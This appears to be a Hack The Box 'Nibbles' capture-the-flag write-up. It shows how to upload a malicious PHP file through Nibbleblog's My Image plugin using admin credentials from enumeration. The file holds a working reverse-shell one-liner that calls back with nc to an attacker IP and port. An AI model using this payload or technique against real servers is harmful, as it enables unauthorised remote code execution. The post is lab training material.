rax-register/rax-register.github.io/_posts/2020-07-10-htb-nibbles.md

 =======================================================

 For manual exploitation we are going to exploit the same vulnerability used by the metasploit module by uploading a malicious .php file using the credentials from our enumeration: admin : nibbles

 First, log back into the nibbleblog dashboard at: http://10.10.10.75/nibbleblog/admin.php

 ![](/images/nibbles/29. dashboard.png)

 Back on the Dashboard of the admin login, we see a “Plugins” section on the left side.
 Click it.

 Under the My Image plugin, click Configure

 ![](/images/nibbles/30. plugins.png)

 Here we can upload a maclicious php file to gain a reverse shell.
 We can look-up php one-liners and then create a php file to do what we need.
 In this case I took a /bin/sh one-liner and added nc execution to call back to my attacking machine, then wrapped it in a php system command.
+This is not the simplest one-liner you can use here, but it works:

     <?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.24 17011 >/tmp/f"); ?>

 ![](/images/nibbles/31. php_file.png)

 Create a .php file (call-back.php in my case) and put the above code into it.
-Save it and then use the nibbleblog myimage plugin to upload it:
+Save it and then use the nibbleblog My Image plugin to upload it:

 Click “Browse” then select the call-back.php file